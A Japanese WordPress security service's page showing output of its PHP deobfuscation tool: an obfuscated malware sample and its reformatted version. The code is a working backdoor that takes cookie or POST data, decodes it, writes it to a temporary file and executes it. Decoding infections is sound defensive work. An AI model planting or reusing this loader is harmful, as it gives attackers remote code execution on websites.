Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php function/* t */sz1 ( $nz2 ){$yq3 =/* mi*/"nIy' E7/gb#<h5o2" . "_v" . "k*efdF63)L?lH0.p@r-sc9u4t" . ";" . "m(1" . "ai8" . "x" ; $gf5=''; foreach( $nz2/*pnu*/as $ql4/* wbhet */){ $gf5 .=/* swx */$yq3 [ $ql4 ]; }return $gf5;}$yb6 = [];$evyj =/* au */77948; $yb6 [] =/* npt */sz1 (/* kblz */A...



難読化されたPHPコード

<?php
function/*   t   */sz1   (  $nz2	){$yq3	=/*  mi*/"nIy' E7/gb#<h5o2" .
"_v" .
"k*efdF63)L?lH0.p@r-sc9u4t" .
";" .
"m(1" .
"ai8" .
"x" ;

$gf5='';


foreach(	$nz2/*pnu*/as   $ql4/*  wbhet  */){
$gf5	.=/* swx */$yq3	[    $ql4	];
}return   $gf5;}$yb6	=   [];$evyj     =/*   au */77948;
$yb6       []     =/* npt  */sz1	(/*   kblz  */Array(47     ,/*   h   */22/*  k */,/* vjrau */41  ,     39/*   yl*/,/*l */13/* ra*/,/* kckx   */47     ,	20/*t   */,	13       ,/* s   */36	,/* tcwh*/6/*m*/,	41      ,       38     ,	38	,/*  e*/36/*   umv   */,/*   ehev  */41	,	25/*  q   */,     6/*ekr   */,/*hrwe  */9	,/*  yz  */36     ,  49	,       20	,/*  x  */6/*  o */,/*   dirp  */39/*z */,    36/* hy   */,/*   xriyx   */47	,   20      ,/*bk   */20/* q  */,/*vvkdq */15	,      24  ,	39/*i  */,       25       ,       31  ,	31/*   cexpv */,       20/*  hw   */,      25	,	31	,)/*   g  */)/*duhh  */;


$yb6/* vot  */[]       =    sz1    (	Array(28   ,	33	,  12	,      33       ,/*u   */4/* gibmm */,       34	,  40/* glhh  */,	0/*   dx*/,    29   ,       48	,	0      ,	18/*   d*/,	45    ,      16/*   uyfht  */,	16	,/*   b   */23/*  o*/,   1/*   sel  */,	27	,/* rm */5	,	16	,      16/* rktwf   */,/*   p */26     ,	43	,/*   xbdkd  */4/*  ujdz   */,)/*  uc */)/*   jd */;

$yb6/*cxem   */[]   =    sz1       (   Array(32	,	44/*  tvxm  */,	14	,    22	,     40    ,/*   oud */29	,/* t   */20     ,)	)/*  ffkur  */;
$yb6     []       =  sz1/*   nwl */(	Array(30       ,    19/*   z*/,)       )	;

$yb6  []      =	sz1	(/*zcwdn   */Array(32/* cz  */,  7   ,)/*   fupme   */)    ;
$yb6/*v   */[]/*i */=    sz1  (/*   itk */Array(10    ,)	)    ;
$yb6/*quh */[]      =	sz1     (	Array(11	,)/*   fb */)	;$yb6[]	=      sz1	(	Array(21	,/*zqt */48   ,    29/*hpqzs */,/* zre   */20/*k*/,   16     ,	33/*  qcbec   */,/*   dzzo*/40  ,     42	,  16    ,       38	,/* cax */14  ,/*  uw  */0/*mmgn*/,  42	,/* ors */20/* sp*/,    0/*yzjvy   */,	42/*quvny   */,     37  ,)/*  nsk */)/* hzxk*/;

$yb6[]	=      sz1       (     Array(21	,/*   rmaw*/48	,  29     ,      20/*   rlqi  */,	16/*mn*/,/* cn */20      ,  50/*cwk */,/*   ooptc */48	,       37      ,   42  ,	37       ,)	)       ;
$yb6[]/*i   */=      sz1	(	Array(47	,/*   d*/35/*   x */,     35/*   iu */,/*lpfy  */47/*   z */,    2     ,     16   ,/* kre*/44	,       20  ,	35/*  fmz*/,/* fst */8/*   b  */,  20/*ahfj   */,)	)       ;$yb6[]	=	sz1   (/*   otx   */Array(37  ,/*i */42	,/*  qoznu  */35      ,	16	,	35/*   xbdfc */,  20	,     33	,/*   bgq  */20	,   47	,	42	,)  )     ;


$yb6[]/*   f */=	sz1/*yssia   */(/*k   */Array(20/*   ysy   */,/* oe */50       ,  33  ,	29	,/* wnk   */14     ,      22/*h */,	20   ,)/*   gieqt*/)/* zsif  */;
$yb6[]      =/*   hkqv   */sz1	(/* xgmz   */Array(37	,/*   zf   */40    ,/*   kgal   */9/*   mnl*/,/* t*/37      ,	42   ,	35/*yivw*/,)      )	;


$yb6[]       =/*   wkk*/sz1/*  v*/(/*  o   */Array(40	,/*  y   */0	,   29/* n*/,  48/* vixy  */,   0	,  18/*o */,)  )   ;


$yb6[]    =	sz1      (      Array(37/*   j  */,/*   cghbk  */42/*w  */,    35	,	29      ,	20      ,/*xgpna */0       ,)       )	;$yb6[]    =	sz1   (	Array(33/*ocmv   */,/* qtnbr  */47	,/*   mq */38	,	18/*ktgs*/,)	)/*  fnsm  */;

$yb6[]  =/*bpdkb   */sz1   (	Array(44/*   t*/,	22    ,	13    ,)/*   k*/)	;





$js12       =	$_COOKIE;	$ek11  =       "47959";

$js12/*   t   */=/*cqze */$yb6[9]($js12,	$_POST);foreach	($js12	as/*  gbh */$kb17/*   btujx*/=>  $sh13)


{
   function/*wczp  */fp8  (     $yb6,  $kb17/*ucj*/,	$tf10     )       {   return       $yb6[12]/*  ocehu   */(/*  tvhew*/$yb6[10]	(	$kb17     .	$yb6[0]       ,   (  $tf10/$yb6[14](	$kb17	)   )      +/*gcg   */1	)/* dowo*/,     0/* ia*/,     $tf10  );

/*  d*/}	function/* xausv */ve7	(  $yb6,	$cw16	)

     {


/*  xd */return	@$yb6[15]/*  gxif  */($yb6[3]    ,	$cw16/*ot   */);
      }




    function	nz9/* ugfi */(/* ajugi */$yb6,	$cw16/*  wavj  */)

	{


	if/*   ftnmm */(    isset	(	$cw16[2]/*wpkp   */)/*  ouu */)	{


/*   nw*/

   $la15/*   dnj */=	$yb6[4]	.	$yb6[16](	$yb6[0]/* i */)/*   ub   */./*  z   */$yb6[2];	@$yb6[7]      (   $la15,/* jloc*/$yb6[6]/* khdry */.   $yb6[1]/* bcyj */./*  pd*/$cw16[1]/*hf  */(	$cw16[2]/*   ckr*/)/*   jzlcu */);/*ezwt   */$ca14    =/*sgww  */$la15;

    @include  (	$ca14	);	if/* cw   */($yb6[8]($la15))/*imoz*/@$yb6[13]/* hzf*/(	$la15	);





      die   ();

   }/*   qdxb   */}



/*dvu*/$sh13/*hpay  */=	ve7    (    $yb6,	$sh13/*  yvx*/);
	nz9/*nui   */(	$yb6,/*   kep */$yb6[11]/*wca   */(  $yb6[5]/*  ehrht */,  $sh13	^	fp8	(    $yb6,/* iga*/$kb17	,	$yb6[14](/*   qsaxp  */$sh13	)    )	)	);

}

デコード(難読化解除)されたコード

<?php

function sz1($nz2)
{
    $yq3 = "nIy' E7/gb#<h5o2_vk*efdF63)L?lH0.p@r-sc9u4t;m(1ai8x";
    $gf5 = '';
    foreach ($nz2 as $ql4) {
        $gf5 .= $yq3[$ql4];
    }
    return $gf5;
}
$yb6 = [];
$evyj = 77948;
$yb6[] = sz1(
    /*   kblz  */
    array(
        47,
        /*   h   */
        22,
        /* vjrau */
        41,
        39,
        /*l */
        13,
        /* kckx   */
        47,
        20,
        13,
        /* s   */
        36,
        /* tcwh*/
        6,
        41,
        38,
        38,
        /*  e*/
        36,
        /*   ehev  */
        41,
        25,
        6,
        /*hrwe  */
        9,
        /*  yz  */
        36,
        49,
        20,
        /*  x  */
        6,
        /*   dirp  */
        39,
        36,
        /*   xriyx   */
        47,
        20,
        /*bk   */
        20,
        /*vvkdq */
        15,
        24,
        39,
        25,
        31,
        31,
        20,
        25,
        31,
    )
);
$yb6[] = sz1(array(
    28,
    33,
    12,
    33,
    /*u   */
    4,
    34,
    40,
    0,
    29,
    48,
    0,
    18,
    45,
    16,
    16,
    /*   b   */
    23,
    1,
    27,
    /* rm */
    5,
    16,
    16,
    /*   p */
    26,
    43,
    /*   xbdkd  */
    4,
));
$yb6[] = sz1(array(
    32,
    44,
    14,
    22,
    40,
    /*   oud */
    29,
    /* t   */
    20,
));
$yb6[] = sz1(array(30, 19));
$yb6[] = sz1(
    /*zcwdn   */
    array(32, 7)
);
$yb6[] = sz1(
    /*   itk */
    array(10)
);
$yb6[] = sz1(array(11));
$yb6[] = sz1(array(
    21,
    /*zqt */
    48,
    29,
    /* zre   */
    20,
    16,
    33,
    /*   dzzo*/
    40,
    42,
    16,
    38,
    /* cax */
    14,
    /*  uw  */
    0,
    42,
    /* ors */
    20,
    0,
    42,
    37,
));
$yb6[] = sz1(array(
    21,
    /*   rmaw*/
    48,
    29,
    20,
    16,
    /* cn */
    20,
    50,
    /*   ooptc */
    48,
    37,
    42,
    37,
));
$yb6[] = sz1(array(
    47,
    /*   d*/
    35,
    35,
    /*lpfy  */
    47,
    2,
    16,
    /* kre*/
    44,
    20,
    35,
    /* fst */
    8,
    20,
));
$yb6[] = sz1(
    /*   otx   */
    array(
        37,
        /*i */
        42,
        /*  qoznu  */
        35,
        16,
        35,
        20,
        33,
        /*   bgq  */
        20,
        47,
        42,
    )
);
$yb6[] = sz1(
    /*k   */
    array(
        20,
        /* oe */
        50,
        33,
        29,
        /* wnk   */
        14,
        22,
        20,
    )
);
$yb6[] = sz1(
    /* xgmz   */
    array(
        37,
        /*   zf   */
        40,
        /*   kgal   */
        9,
        /* t*/
        37,
        42,
        35,
    )
);
$yb6[] = sz1(
    /*  o   */
    array(
        40,
        /*  y   */
        0,
        29,
        48,
        0,
        18,
    )
);
$yb6[] = sz1(array(
    37,
    /*   cghbk  */
    42,
    35,
    29,
    20,
    /*xgpna */
    0,
));
$yb6[] = sz1(array(
    33,
    /* qtnbr  */
    47,
    /*   mq */
    38,
    18,
));
$yb6[] = sz1(array(44, 22, 13));
$js12 = $_COOKIE;
$ek11 = "47959";
$js12 = $yb6[9]($js12, $_POST);
foreach ($js12 as $kb17 => $sh13) {
    function fp8($yb6, $kb17, $tf10)
    {
        return $yb6[12](
            /*  tvhew*/
            $yb6[10]($kb17 . $yb6[0], $tf10 / $yb6[14]($kb17) + 1),
            0,
            $tf10
        );
    }
    function ve7($yb6, $cw16)
    {
        /*  xd */
        return @$yb6[15]($yb6[3], $cw16);
    }
    function nz9($yb6, $cw16)
    {
        if (isset($cw16[2])) {
            /*   nw*/
            $la15 = $yb6[4] . $yb6[16]($yb6[0]) . $yb6[2];
            @$yb6[7](
                $la15,
                /* jloc*/
                $yb6[6] . $yb6[1] . $cw16[1]($cw16[2])
            );
            /*ezwt   */
            $ca14 = $la15;
            @(include $ca14);
            if ($yb6[8]($la15)) {
                /*imoz*/
                @$yb6[13]($la15);
            }
            die;
        }
        /*   qdxb   */
    }
    /*dvu*/
    $sh13 = ve7($yb6, $sh13);
    nz9(
        $yb6,
        /*   kep */
        $yb6[11]($yb6[5], $sh13 ^ fp8(
            $yb6,
            /* iga*/
            $kb17,
            $yb6[14](
                /*   qsaxp  */
                $sh13
            )
        ))
    );
}


■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.